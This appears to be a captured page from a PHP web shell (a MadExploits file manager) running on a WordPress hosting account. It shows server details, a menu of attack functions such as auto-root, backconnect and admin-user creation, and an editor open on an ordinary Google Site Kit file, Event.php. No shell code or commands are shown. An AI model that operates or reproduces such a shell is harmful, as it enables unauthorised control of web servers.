Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.226.186.225
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
Advanced_Tracking /
[ HOME SHELL ]
Name
Size
Permission
Action
AMP_Config_Injector.php
1.82
KB
-rw-r--r--
Event.php
2.86
KB
-rw-r--r--
Event_List.php
1.47
KB
-rw-r--r--
Event_List_Registry.php
1.11
KB
-rw-r--r--
Script_Injector.php
1.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Event.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\Advanced_Tracking\Event * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4\Advanced_Tracking; use Exception; /** * Class for representing a single tracking event that Advanced_Tracking tracks. * * @since 1.18.0. * @since 1.121.0 Migrated from the Analytics (UA) namespace. * @access private * @ignore */ final class Event implements \JsonSerializable { /** * The measurement event's configuration. * * @since 1.18.0. * @var array */ private $config; /** * Event constructor. * * @since 1.18.0. * * @param array $config { * The event's configuration. * * @type string $action Required. The event action / event name to send. * @type string $on Required. The DOM event to send the event for. * @type string $selector Required, unless $on is 'DOMContentLoaded'. The DOM selector on which to listen * to the $on event. * @type array|null $metadata Optional. Associative array of event metadata to send, such as 'event_category', * 'event_label' etc, or null to not send any extra event data. * } * @throws Exception Thrown when config param is undefined. */ public function __construct( $config ) { $this->config = $this->validate_config( $config ); } /** * Returns an associative event containing the event attributes. * * @since 1.18.0. * * @return array The configuration in JSON-serializable format. */ #[\ReturnTypeWillChange] public function jsonSerialize() { return $this->config; } /** * Returns the measurement event configuration. * * @since 1.18.0. * * @return array The config. */ public function get_config() { return $this->config; } /** * Validates the configuration keys and value types. * * @since 1.18.0. * * @param array $config The event's configuration. * @return array The event's configuration. * @throws Exception Thrown when invalid keys or value type. */ private function validate_config( $config ) { $valid_keys = array( 'action', 'selector', 'on', 'metadata', ); foreach ( $config as $key => $value ) { if ( ! in_array( $key, $valid_keys, true ) ) { throw new Exception( 'Invalid configuration parameter: ' . $key ); } } if ( ! array_key_exists( 'metadata', $config ) ) { $config['metadata'] = null; } if ( array_key_exists( 'on', $config ) && 'DOMContentLoaded' === $config['on'] ) { $config['selector'] = ''; } foreach ( $valid_keys as $key ) { if ( ! array_key_exists( $key, $config ) ) { throw new Exception( 'Missed configuration parameter: ' . $key ); } } return $config; } }
Close